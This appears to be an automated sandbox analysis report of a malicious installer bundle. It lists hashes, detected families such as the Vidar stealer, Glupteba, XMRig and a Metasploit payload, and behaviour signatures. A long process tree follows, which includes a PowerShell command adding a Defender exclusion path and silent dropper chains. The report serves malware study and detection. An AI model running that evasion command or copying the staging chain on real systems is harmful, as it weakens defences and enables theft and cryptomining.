Resubmissions

07-09-2021 17:26

210907-vzzaxsdae6 10

07-09-2021 13:18

210907-qkaa2acfe3 10

06-09-2021 17:52

210906-wfz9jsbch4 10

06-09-2021 17:51

210906-wfnwhsbch3 10

06-09-2021 13:27

210906-qp3hdaedaj 10

06-09-2021 09:28

210906-lfpgyaeael 10

06-09-2021 04:33

210906-e6mmpsaaa2 10

05-09-2021 05:25

210905-f4h26sfab6 10

04-09-2021 21:32

210904-1dqdsahfdj 10

04-09-2021 21:19

210904-z56z6shfck 10

Analysis

  • max time kernel
    602s
  • max time network
    604s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    06-09-2021 17:52

General

  • Target

    setup_x86_x64_install.exe

  • Size

    2.2MB

  • MD5

    e3b3a95ef03de0de77cca7a54ea22c94

  • SHA1

    d318d234f8f27f25de660d9881113df9d11c24ff

  • SHA256

    baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

  • SHA512

    3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 14 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • XMRig Miner Payload 1 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 34 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 46 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 31 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4592
      • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3780
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:716
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4772
          • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri1544861ac3fe6a.exe
            Fri1544861ac3fe6a.exe
            5⤵
            • Executes dropped EXE
            PID:552
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 284
              6⤵
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2188
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri156ec98815f89c.exe
            Fri156ec98815f89c.exe
            5⤵
            • Executes dropped EXE
            PID:784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri155442fc38b.exe
            Fri155442fc38b.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Users\Admin\AppData\Roaming\2963677.exe
              "C:\Users\Admin\AppData\Roaming\2963677.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1436
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1436 -s 2096
                7⤵
                • Program crash
                • Checks processor information in registry
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:5904
            • C:\Users\Admin\AppData\Roaming\2798108.exe
              "C:\Users\Admin\AppData\Roaming\2798108.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              PID:4128
              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: SetClipboardViewer
                PID:5868
            • C:\Users\Admin\AppData\Roaming\4316960.exe
              "C:\Users\Admin\AppData\Roaming\4316960.exe"
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5592
            • C:\Users\Admin\AppData\Roaming\8417115.exe
              "C:\Users\Admin\AppData\Roaming\8417115.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5756
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 2428
                7⤵
                • Program crash
                • Checks processor information in registry
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:504
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4564
          • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri15af75ee9b.exe
            Fri15af75ee9b.exe
            5⤵
            • Executes dropped EXE
            PID:1196
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 280
              6⤵
              • Drops file in Windows directory
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c APPNAME7.exe
          4⤵
            PID:4740
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4876
            • C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri157e25afd971.exe
              Fri157e25afd971.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1000
              • C:\Users\Admin\AppData\Local\Temp\is-BMPJD.tmp\Fri157e25afd971.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-BMPJD.tmp\Fri157e25afd971.tmp" /SL5="$20150,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0F1E7F93\Fri157e25afd971.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1740
                • C:\Users\Admin\AppData\Local\Temp\is-QB777.tmp\zab2our.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-QB777.tmp\zab2our.exe" /S /UID=burnerch2
                  7⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:884
                  • C:\Program Files\Internet Explorer\KJTYDXDGDW\ultramediaburner.exe
                    "C:\Program Files\Internet Explorer\KJTYDXDGDW\ultramediaburner.exe" /VERYSILENT
                    8⤵
                    • Executes dropped EXE
                    PID:5316
                    • C:\Users\Admin\AppData\Local\Temp\is-89515.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-89515.tmp\ultramediaburner.tmp" /SL5="$202BA,281924,62464,C:\Program Files\Internet Explorer\KJTYDXDGDW\ultramediaburner.exe" /VERYSILENT
                      9⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      PID:6116
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        10⤵
                        • Executes dropped EXE
                        PID:5804
                  • C:\Users\Admin\AppData\Local\Temp\1b-86641-293-9febe-6d61e91dcdfe8\Tofykepazha.exe
                    "C:\Users\Admin\AppData\Local\Temp\1b-86641-293-9febe-6d61e91dcdfe8\Tofykepazha.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2052
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      9⤵
                      • Adds Run key to start application
                      • Enumerates system info in registry
                      • Suspicious use of FindShellTrayWindow
                      PID:5500
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e4a446f8,0x7ff9e4a44708,0x7ff9e4a44718
                        10⤵
                          PID:5376
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                          10⤵
                            PID:424
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                            10⤵
                              PID:4828
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
                              10⤵
                                PID:6044
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                10⤵
                                  PID:5440
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                  10⤵
                                    PID:4436
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:1
                                    10⤵
                                      PID:6124
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                                      10⤵
                                        PID:4984
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
                                        10⤵
                                          PID:4980
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                                          10⤵
                                            PID:1588
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                                            10⤵
                                              PID:5996
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                                              10⤵
                                                PID:8752
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
                                                10⤵
                                                  PID:4456
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4660 /prefetch:2
                                                  10⤵
                                                    PID:884
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4804 /prefetch:8
                                                    10⤵
                                                      PID:6548
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                                                      10⤵
                                                        PID:7572
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                                                        10⤵
                                                          PID:9072
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
                                                          10⤵
                                                            PID:1584
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
                                                            10⤵
                                                              PID:6840
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
                                                              10⤵
                                                                PID:7528
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
                                                                10⤵
                                                                  PID:7744
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
                                                                  10⤵
                                                                    PID:7900
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
                                                                    10⤵
                                                                      PID:4820
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
                                                                      10⤵
                                                                        PID:2296
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
                                                                        10⤵
                                                                          PID:8328
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
                                                                          10⤵
                                                                            PID:7608
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                                                                            10⤵
                                                                              PID:8444
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:8
                                                                              10⤵
                                                                                PID:8580
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4464 /prefetch:1
                                                                                10⤵
                                                                                  PID:8608
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
                                                                                  10⤵
                                                                                    PID:8684
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
                                                                                    10⤵
                                                                                      PID:2556
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
                                                                                      10⤵
                                                                                        PID:8956
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
                                                                                        10⤵
                                                                                          PID:9036
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
                                                                                          10⤵
                                                                                            PID:9220
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,10930203597432929941,11808743271813797593,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                            10⤵
                                                                                              PID:9248
